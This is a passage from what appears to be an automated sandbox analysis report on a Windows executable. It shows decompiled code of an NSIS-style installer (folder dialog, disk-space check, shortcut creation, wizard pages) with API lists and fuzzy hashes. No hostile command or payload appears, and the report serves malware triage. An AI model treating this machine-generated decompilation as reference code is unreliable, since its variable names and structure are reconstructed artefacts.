            								ShowWindow(_v12, 5);
            								E00403DDC(_v12);
            								L89:
            								return E00403E0E(_a8, _a12, _a16);
            							}
            						}
            						goto L19;
            					}
            				}
            			}

            APIs
            • GetDlgItem.USER32 ref: 004046BE
            • GetDlgItem.USER32 ref: 004046CB
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
            • LoadBitmapA.USER32 ref: 0040472A
            • SetWindowLongA.USER32 ref: 0040473D
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
            • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
            • DeleteObject.GDI32(?), ref: 0040479D
            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
            • GetWindowLongA.USER32 ref: 004048D7
            • SetWindowLongA.USER32 ref: 004048E5
            • ShowWindow.USER32(?,00000005), ref: 004048F6
            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
            • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
            • GlobalFree.KERNEL32 ref: 00404AE2
            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
            • ShowWindow.USER32(?,00000000), ref: 00404C78
            • GetDlgItem.USER32 ref: 00404C83
            • ShowWindow.USER32(00000000), ref: 00404C8A
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
            • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
            				int _v8;
            				signed int _v12;
            				long _v16;
            				long _v20;
            				char _v24;
            				long _v28;
            				char _v32;
            				intOrPtr _v36;
            				long _v40;
            				signed int _v44;
            				CHAR* _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				CHAR* _v68;
            				void _v72;
            				char _v76;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t75;
            				signed char* _t80;
            				intOrPtr* _t81;
            				int _t86;
            				int _t88;
            				int _t100;
            				signed int _t105;
            				char* _t110;
            				intOrPtr _t114;
            				intOrPtr* _t128;
            				signed int _t140;
            				signed int _t145;
            				CHAR* _t151;
            
            				_t75 =  *0x79ed58;
            				_v36 = _t75;
            				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
            				_v12 =  *((intOrPtr*)(_t75 + 0x38));
            				if(_a8 == 0x40b) {
            					E004052A3(0x3fb, _t151);
            					E00405BFB(_t151);
            				}
            				if(_a8 != 0x110) {
            					L8:
            					if(_a8 != 0x111) {
            						L19:
            						if(_a8 == 0x40f) {
            							L21:
            							_v8 = _v8 & 0x00000000;
            							_v12 = _v12 & 0x00000000;
            							_t145 = _t144 | 0xffffffff;
            							E004052A3(0x3fb, _t151);
            							if(E004055AC(_t169, _t151) == 0) {
            								_v8 = 1;
            							}
            							E004059BF(0x79e550, _t151);
            							_t80 = E0040555F(0x79e550);
            							if(_t80 != 0) {
            								 *_t80 =  *_t80 & 0x00000000;
            							}
            							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
            							if(_t81 == 0) {
            								L28:
            								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
            								__eflags = _t86;
            								if(_t86 == 0) {
            									goto L31;
            								}
            								_t100 = _v20 * _v28;
            								__eflags = _t100;
            								_t145 = MulDiv(_t100, _v16, 0x400);
            								goto L30;
            							} else {
            								_push( &_v32);
            								_push( &_v24);
            								_push( &_v44);
            								_push(0x79e550);
            								if( *_t81() == 0) {
            									goto L28;
            								}
            								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
            								L30:
            								_v12 = 1;
            								L31:
            								if(_t145 < E004045FA(5)) {
            									_v8 = 2;
            								}
            								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
            									E00404545(0x3ff, 0xfffffffb, _t87);
            									if(_v12 == 0) {
            										SetDlgItemTextA(_a4, 0x400, 0x79e540);
            									} else {
            										E00404545(0x400, 0xfffffffc, _t145);
            									}
            								}
            								_t88 = _v8;
            								 *0x7a3024 = _t88;
            								if(_t88 == 0) {
            									_v8 = E00401410(7);
            								}
            								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
            									_v8 = 0;
            								}
            								E00403DC9(0 | _v8 == 0x00000000);
            								if(_v8 == 0 &&  *0x79f570 == 0) {
            									E0040417A();
            								}
            								 *0x79f570 = 0;
            								goto L45;
            							}
            						}
            						_t169 = _a8 - 0x405;
            						if(_a8 != 0x405) {
            							goto L45;
            						}
            						goto L21;
            					}
            					_t105 = _a12 & 0x0000ffff;
            					if(_t105 != 0x3fb) {
            						L12:
            						if(_t105 == 0x3e9) {
            							_t140 = 7;
            							memset( &_v72, 0, _t140 << 2);
            							_t144 = 0x79f580;
            							_v76 = _a4;
            							_v68 = 0x79f580;
            							_v56 = E004044DF;
            							_v52 = _t151;
            							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
            							_t110 =  &_v76;
            							_v60 = 0x41;
            							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
            							if(_t110 == 0) {
            								_a8 = 0x40f;
            							} else {
            								E0040521C(0, _t110);
            								E004054CC(_t151);
            								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
            								if(_t114 != 0) {
            									_push(_t114);
            									_push(0);
            									E004059E1(0x3fb, 0x79f580, _t151);
            									_t144 = 0x7a1f20;
            									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
            										lstrcatA(_t151, 0x7a1f20);
            									}
            								}
            								 *0x79f570 =  *0x79f570 + 1;
            								SetDlgItemTextA(_a4, 0x3fb, _t151);
            							}
            						}
            						goto L19;
            					}
            					if(_a12 >> 0x10 != 0x300) {
            						goto L45;
            					}
            					_a8 = 0x40f;
            					goto L12;
            				} else {
            					_t144 = GetDlgItem(_a4, 0x3fb);
            					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
            						E004054CC(_t151);
            					}
            					 *0x7a2758 = _a4;
            					SetWindowTextA(_t144, _t151);
            					_push( *((intOrPtr*)(_a16 + 0x34)));
            					_push(1);
            					E00403DA7(_a4);
            					_push( *((intOrPtr*)(_a16 + 0x30)));
            					_push(0x14);
            					E00403DA7(_a4);
            					E00403DDC(_t144);
            					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
            					if(_t128 == 0) {
            						L45:
            						return E00403E0E(_a8, _a12, _a16);
            					}
            					 *_t128(_t144, 1);
            					goto L8;
            				}
            			}

            0x004041eb
            0x004041f2
            0x004041fe
            0x0040420c
            0x00404214
            0x00404218
            0x0040421e
            0x0040421e
            0x0040422a
            0x004042a4
            0x004042ab
            0x00404377
            0x0040437e
            0x0040438d
            0x0040438d
            0x00404391
            0x00404397
            0x0040439a
            0x004043a7
            0x004043a9
            0x004043a9
            0x004043b7
            0x004043bd
            0x004043c4
            0x004043c6
            0x004043c6
            0x004043d3
            0x004043df
            0x00404403
            0x00404414
            0x0040441a
            0x0040441c
            0x00000000
            0x00000000
            0x00404422
            0x00404422
            0x00404430
            0x00000000
            0x004043e1
            0x004043e4
            0x004043e8
            0x004043ec
            0x004043ed
            0x004043f2
            0x00000000
            0x00000000
            0x004043fa
            0x00404432
            0x00404432
            0x00404439
            0x00404442
            0x00404444
            0x00404444
            0x00404456
            0x00404460
            0x00404468
            0x0040447e
            0x0040446a
            0x0040446e
            0x0040446e
            0x00404468
            0x00404483
            0x00404488
            0x0040448d
            0x00404496
            0x00404496
            0x0040449f
            0x004044a1
            0x004044a1
            0x004044ad
            0x004044b5
            0x004044bf
            0x004044bf
            0x004044c4
            0x00000000
            0x004044c4
            0x004043df
            0x00404380
            0x00404387
            0x00000000
            0x00000000
            0x00000000
            0x00404387
            0x004042b1
            0x004042b7
            0x004042d1
            0x004042d6
            0x004042e0
            0x004042e7
            0x004042ec
            0x004042f6
            0x004042f9
            0x004042fc
            0x00404303
            0x0040430b
            0x0040430e
            0x00404312
            0x00404319
            0x00404321
            0x00404370
            0x00404323
            0x00404324
            0x0040432a
            0x00404334
            0x0040433c
            0x0040433e
            0x0040433f
            0x00404341
            0x00404347
            0x00404355
            0x00404359
            0x00404359
            0x00404355
            0x0040435e
            0x00404369
            0x00404369
            0x00404321
            0x00000000
            0x004042d6
            0x004042c4
            0x00000000
            0x00000000
            0x004042ca
            0x00000000
            0x0040422c
            0x00404237
            0x00404240
            0x0040424d
            0x0040424d
            0x00404257
            0x0040425c
            0x00404265
            0x00404268
            0x0040426d
            0x00404275
            0x00404278
            0x0040427d
            0x00404283
            0x00404292
            0x00404299
            0x004044ca
            0x004044dc
            0x004044dc
            0x004042a2
            0x00000000
            0x004042a2

            APIs
            • GetDlgItem.USER32 ref: 00404230
            • SetWindowTextA.USER32(00000000,?), ref: 0040425C
            • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
            • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
            • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
            • SetDlgItemTextA.USER32 ref: 00404369
              • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
            • SetDlgItemTextA.USER32 ref: 0040447E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
            • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
            • API String ID: 2007447535-1909522251
            • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
            • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 74%
            			E004020A6(void* __eflags) {
            				void* _t44;
            				intOrPtr* _t48;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				intOrPtr* _t54;
            				signed int _t58;
            				intOrPtr* _t59;
            				intOrPtr* _t62;
            				intOrPtr* _t64;
            				intOrPtr* _t66;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				int _t75;
            				signed int _t81;
            				intOrPtr* _t88;
            				void* _t95;
            				void* _t96;
            				void* _t100;
            
            				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
            				_t96 = E00402A9A(0xffffffdf);
            				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
            				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
            				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
            				if(E00405538(_t96) == 0) {
            					E00402A9A(0x21);
            				}
            				_t44 = _t100 + 8;
            				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
            				if(_t44 < _t75) {
            					L12:
            					 *((intOrPtr*)(_t100 - 4)) = 1;
            					_push(0xfffffff0);
            				} else {
            					_t48 =  *((intOrPtr*)(_t100 + 8));
            					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
            					if(_t95 >= _t75) {
            						_t52 =  *((intOrPtr*)(_t100 + 8));
            						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
            						_t54 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
            						_t81 =  *(_t100 - 0x14);
            						_t58 = _t81 >> 0x00000008 & 0x000000ff;
            						if(_t58 != 0) {
            							_t88 =  *((intOrPtr*)(_t100 + 8));
            							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
            							_t81 =  *(_t100 - 0x14);
            						}
            						_t59 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
            						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
            							_t71 =  *((intOrPtr*)(_t100 + 8));
            							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
            						}
            						_t62 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
            						_t64 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
            						if(_t95 >= _t75) {
            							 *0x409418 = _t75;
            							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
            							_t69 =  *((intOrPtr*)(_t100 - 8));
            							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
            						}
            						_t66 =  *((intOrPtr*)(_t100 - 8));
            						 *((intOrPtr*)( *_t66 + 8))(_t66);
            					}
            					_t50 =  *((intOrPtr*)(_t100 + 8));
            					 *((intOrPtr*)( *_t50 + 8))(_t50);
            					if(_t95 >= _t75) {
            						_push(0xfffffff4);
            					} else {
            						goto L12;
            					}
            				}
            				E00401428();
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
            				return 0;
            			}

            0x004020af
            0x004020b9
            0x004020c2
            0x004020cc
            0x004020d5
            0x004020df
            0x004020e3
            0x004020e3
            0x004020e8
            0x004020f9
            0x00402101
            0x004021df
            0x004021df
            0x004021e6
            0x00402107
            0x00402107
            0x00402118
            0x0040211c
            0x00402122
            0x0040212c
            0x0040212e
            0x00402139
            0x0040213c
            0x00402149
            0x0040214b
            0x0040214d
            0x00402154
            0x00402157
            0x00402157
            0x0040215a
            0x00402164
            0x0040216c
            0x00402171
            0x0040217d
            0x0040217d
            0x00402180
            0x00402189
            0x0040218c
            0x00402195
            0x0040219a
            0x004021ac
            0x004021b5
            0x004021bb
            0x004021c7
            0x004021c7
            0x004021c9
            0x004021cf
            0x004021cf
            0x004021d2
            0x004021d8
            0x004021dd
            0x004021f2
            0x00000000
            0x00000000
            0x00000000
            0x004021dd
            0x004021e8
            0x00402932
            0x0040293e

            APIs
            • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-47812868
            • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
            • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
            				void* _t19;
            
            				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
            					E0040591D(__edi, _t6);
            					_push(_t19 - 0x178);
            					_push(__esi);
            					E004059BF();
            				} else {
            					 *((char*)(__edi)) = __ebx;
            					 *__esi = __ebx;
            					 *((intOrPtr*)(_t19 - 4)) = 1;
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
            				return 0;
            			}

            0x004026d4
            0x004026e8
            0x004026f3
            0x004026f4
            0x00402855
            0x004026d6
            0x004026d6
            0x004026d8
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileFindFirst
            • String ID:
            • API String ID: 1974802433-0
            • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
            • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
            • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
            • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
            • Instruction ID: f31aae8a0c4ab2743bef54ef87bda09f4ffcf1a7b796092de6b9c91daba54162
            • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
            • Instruction Fuzzy Hash: FE014D78A10208EFCB41DF99C58099DBBF5FF08220F158595E818E7721D371AE50EB40
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
            				void* _v84;
            				void* _v88;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t33;
            				signed int _t35;
            				struct HWND__* _t37;
            				struct HWND__* _t47;
            				struct HWND__* _t65;
            				struct HWND__* _t71;
            				struct HWND__* _t84;
            				struct HWND__* _t89;
            				struct HWND__* _t97;
            				int _t101;
            				int _t104;
            				struct HWND__* _t117;
            				struct HWND__* _t120;
            				signed int _t122;
            				struct HWND__* _t127;
            				long _t132;
            				int _t134;
            				int _t135;
            				struct HWND__* _t136;
            				void* _t139;
            
            				_t135 = _a8;
            				if(_t135 == 0x110 || _t135 == 0x408) {
            					_t33 = _a12;
            					_t117 = _a4;
            					__eflags = _t135 - 0x110;
            					 *0x79f56c = _t33;
            					if(_t135 == 0x110) {
            						 *0x7a2f84 = _t117;
            						 *0x79f57c = GetDlgItem(_t117, 1);
            						_t89 = GetDlgItem(_t117, 2);
            						_push(0xffffffff);
            						_push(0x1c);
            						 *0x79e548 = _t89;
            						E00403DA7(_t117);
            						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
            						 *0x7a274c = E00401410(4);
            						_t33 = 1;
            						__eflags = 1;
            						 *0x79f56c = 1;
            					}
            					_t120 =  *0x409284; // 0xffffffff
            					_t132 = (_t120 << 6) +  *0x7a2fa0;
            					__eflags = _t120;
            					if(_t120 < 0) {
            						L38:
            						E00403DF3(0x40b);
            						while(1) {
            							_t35 =  *0x79f56c;
            							 *0x409284 =  *0x409284 + _t35;
            							_t132 = _t132 + (_t35 << 6);
            							_t37 =  *0x409284; // 0xffffffff
            							__eflags = _t37 -  *0x7a2fa4;
            							if(_t37 ==  *0x7a2fa4) {
            								E00401410(1);
            							}
            							__eflags =  *0x7a274c;
            							if( *0x7a274c != 0) {
            								break;
            							}
            							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
            							if(__eflags >= 0) {
            								break;
            							}
            							_push( *((intOrPtr*)(_t132 + 0x24)));
            							_t122 =  *(_t132 + 0x14);
            							_push(0x7ab000);
            							E004059E1(_t117, _t122, _t132);
            							_push( *((intOrPtr*)(_t132 + 0x20)));
            							_push(0xfffffc19);
            							E00403DA7(_t117);
            							_push( *((intOrPtr*)(_t132 + 0x1c)));
            							_push(0xfffffc1b);
            							E00403DA7(_t117);
            							_push( *((intOrPtr*)(_t132 + 0x28)));
            							_push(0xfffffc1a);
            							E00403DA7(_t117);
            							_t47 = GetDlgItem(_t117, 3);
            							__eflags =  *0x7a300c;
            							_t136 = _t47;
            							if( *0x7a300c != 0) {
            								_t122 = _t122 & 0x0000fefd | 0x00000004;
            								__eflags = _t122;
            							}
            							ShowWindow(_t136, _t122 & 0x00000008);
            							EnableWindow(_t136, _t122 & 0x00000100);
            							E00403DC9(_t122 & 0x00000002);
            							EnableWindow( *0x79e548, _t122 & 0x00000004);
            							SendMessageA(_t136, 0xf4, 0, 1);
            							__eflags =  *0x7a300c;
            							if( *0x7a300c == 0) {
            								_push( *0x79f57c);
            							} else {
            								SendMessageA(_t117, 0x401, 2, 0);
            								_push( *0x79e548);
            							}
            							E00403DDC();
            							E004059BF(0x79f580, 0x7a2780);
            							_push( *((intOrPtr*)(_t132 + 0x18)));
            							_push( &(0x79f580[lstrlenA(0x79f580)]));
            							E004059E1(_t117, 0, _t132);
            							SetWindowTextA(_t117, 0x79f580);
            							_push(0);
            							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
            							__eflags = _t65;
            							if(_t65 != 0) {
            								continue;
            							} else {
            								__eflags =  *_t132 - _t65;
            								if( *_t132 == _t65) {
            									continue;
            								}
            								__eflags =  *(_t132 + 4) - 5;
            								if( *(_t132 + 4) != 5) {
            									DestroyWindow( *0x7a2758);
            									 *0x79ed58 = _t132;
            									__eflags =  *_t132;
            									if( *_t132 > 0) {
            										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
            										__eflags = _t71;
            										 *0x7a2758 = _t71;
            										if(_t71 != 0) {
            											_push( *((intOrPtr*)(_t132 + 0x2c)));
            											_push(6);
            											E00403DA7(_t71);
            											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
            											ScreenToClient(_t117, _t139 + 0x10);
            											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
            											_push(0);
            											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
            											ShowWindow( *0x7a2758, 8);
            											E00403DF3(0x405);
            										}
            									}
            									goto L58;
            								}
            								__eflags =  *0x7a300c - _t65;
            								if( *0x7a300c != _t65) {
            									goto L61;
            								}
            								__eflags =  *0x7a3000 - _t65;
            								if( *0x7a3000 != _t65) {
            									continue;
            								}
            								goto L61;
            							}
            						}
